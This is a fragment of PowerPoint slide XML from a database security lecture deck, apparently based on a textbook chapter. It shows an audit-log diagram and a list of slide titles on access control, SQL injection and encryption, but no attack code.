        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="4924425"/>
            <a:ext cx="742950" cy="1047750"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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609600" indent="-609600"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22534" name="文字方塊 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7029450" y="5972175"/>
            <a:ext cx="1428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baseline="0" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>System log</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22535" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="4924425"/>
            <a:ext cx="6286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…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" b="1" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22536" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3450566" y="5652651"/>
            <a:ext cx="3478741" cy="1083374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="290CD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…</a:t>
            </a:r>
          </a:p>
          <a:p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200. 15:30:20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" baseline="0" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>leeys</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>inserts </a:t>
            </a:r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employee …</a:t>
            </a:r>
          </a:p>
          <a:p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201. 15:32:30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" baseline="0" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>leeys</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deletes </a:t>
            </a:r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project …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" baseline="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" baseline="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="新細明體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en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="-2500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11070</TotalTime>
  <Words>5960</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>889</Paragraphs>
  <Slides>72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0" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Soaring</vt:lpstr>
      <vt:lpstr>Chapter 25 Introduction to Database Security Part 1</vt:lpstr>
      <vt:lpstr>Chapter Outline</vt:lpstr>
      <vt:lpstr>Database Security Issues</vt:lpstr>
      <vt:lpstr>Threats and Countermeasures</vt:lpstr>
      <vt:lpstr>Control Measures</vt:lpstr>
      <vt:lpstr>Control Measures</vt:lpstr>
      <vt:lpstr>Database Security Mechanisms</vt:lpstr>
      <vt:lpstr>1.2 Database Security and the DBA</vt:lpstr>
      <vt:lpstr>Database Audits</vt:lpstr>
      <vt:lpstr>Chapter Outline</vt:lpstr>
      <vt:lpstr>Discretionary Access Control Based on Granting and Revoking Privileges</vt:lpstr>
      <vt:lpstr>Privileges at Account Level</vt:lpstr>
      <vt:lpstr>Discretionary Privileges at Relation Level</vt:lpstr>
      <vt:lpstr>Discretionary Privileges: Grant and Revoke</vt:lpstr>
      <vt:lpstr>An Example</vt:lpstr>
      <vt:lpstr>Privileges in SQL on Relation R</vt:lpstr>
      <vt:lpstr>An Example (2)</vt:lpstr>
      <vt:lpstr>Revoking Privileges</vt:lpstr>
      <vt:lpstr>Propagation of Privileges using the GRANT OPTION</vt:lpstr>
      <vt:lpstr>An Example (3)</vt:lpstr>
      <vt:lpstr>2.2 Specifying Privileges Using Views</vt:lpstr>
      <vt:lpstr>An Example(4)</vt:lpstr>
      <vt:lpstr>An Example (5)</vt:lpstr>
      <vt:lpstr>2.6 Specifying Limits on Propagation of Privileges</vt:lpstr>
      <vt:lpstr>Chapter Outline</vt:lpstr>
      <vt:lpstr>3 Mandatory Access Control and Role-Based Access Control for Multilevel Security</vt:lpstr>
      <vt:lpstr>Multilevel Security: Bell-LaPadula Model</vt:lpstr>
      <vt:lpstr>Multilevel Security for A Relation</vt:lpstr>
      <vt:lpstr>Filtering</vt:lpstr>
      <vt:lpstr>Polyinstantiation</vt:lpstr>
      <vt:lpstr>Entity Integrity Constraint in Multilevel Relation</vt:lpstr>
      <vt:lpstr>3.1 Comparing Discretionary Access Control and Mandatory Access Control</vt:lpstr>
      <vt:lpstr>3.2 Role-Based Access Control</vt:lpstr>
      <vt:lpstr>Role Hierarchy</vt:lpstr>
      <vt:lpstr>Temporal Constraints and Web-base AP</vt:lpstr>
      <vt:lpstr>Label-Based Security and Row-Level Access Control</vt:lpstr>
      <vt:lpstr>Label-Based Security</vt:lpstr>
      <vt:lpstr>3.3 Access Control Policies for  E-Commerce and the Web</vt:lpstr>
      <vt:lpstr>Access Control Policies for  E-Commerce and the Web</vt:lpstr>
      <vt:lpstr>Frequent Attacks on Databases</vt:lpstr>
      <vt:lpstr>SQL Injection Methods</vt:lpstr>
      <vt:lpstr>SQL Manipulation</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Function Call Injection</vt:lpstr>
      <vt:lpstr>Function Call Injection</vt:lpstr>
      <vt:lpstr>Risks Associated with SQL Injection (1)</vt:lpstr>
      <vt:lpstr>Risks Associated with SQL Injection (2)</vt:lpstr>
      <vt:lpstr>Protection Techniques against SQL Injection</vt:lpstr>
      <vt:lpstr>Filter Input (Input Validation)</vt:lpstr>
      <vt:lpstr>Chapter 25 Introduction to Database Security  Part 2</vt:lpstr>
      <vt:lpstr>Chapter Outline</vt:lpstr>
      <vt:lpstr>Statistical Database Security</vt:lpstr>
      <vt:lpstr>Statistical Queries</vt:lpstr>
      <vt:lpstr>Inferring Individual’s Information</vt:lpstr>
      <vt:lpstr>Solutions to Information Inferring</vt:lpstr>
      <vt:lpstr>Introduction to Flow Control</vt:lpstr>
      <vt:lpstr>Covert Channels</vt:lpstr>
      <vt:lpstr>6 Encryption and Public Key Infrastructures</vt:lpstr>
      <vt:lpstr>Data and Advanced Encryption Standards</vt:lpstr>
      <vt:lpstr>Public Key Encryption</vt:lpstr>
      <vt:lpstr>Ingredients of Public Key Encryption</vt:lpstr>
      <vt:lpstr>Public Key Encryption</vt:lpstr>
      <vt:lpstr>RSA Public Key Encryption</vt:lpstr>
      <vt:lpstr>RSA Public Key Encryption</vt:lpstr>
      <vt:lpstr>Encryption and Decryption</vt:lpstr>
      <vt:lpstr>Digital Signatures</vt:lpstr>
      <vt:lpstr>Digital Signatures</vt:lpstr>
      <vt:lpstr>Digital Certificates</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Digital Certificates</vt:lpstr>
      <vt:lpstr>Challenges of Database Security</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Addsion-Wesley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</dc:title>
  <dc:creator>Shamkant B. Navathe</dc:creator>
  <cp:lastModifiedBy>Jerry Chien</cp:lastModifiedBy>
  <cp:revision>789</cp:revision>
  <cp:lastPrinted>2001-05-28T10:10:18Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1998-07-18T17:10:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-05T09:59:40Z</dcterms:modified>
</cp:coreProperties>
</file>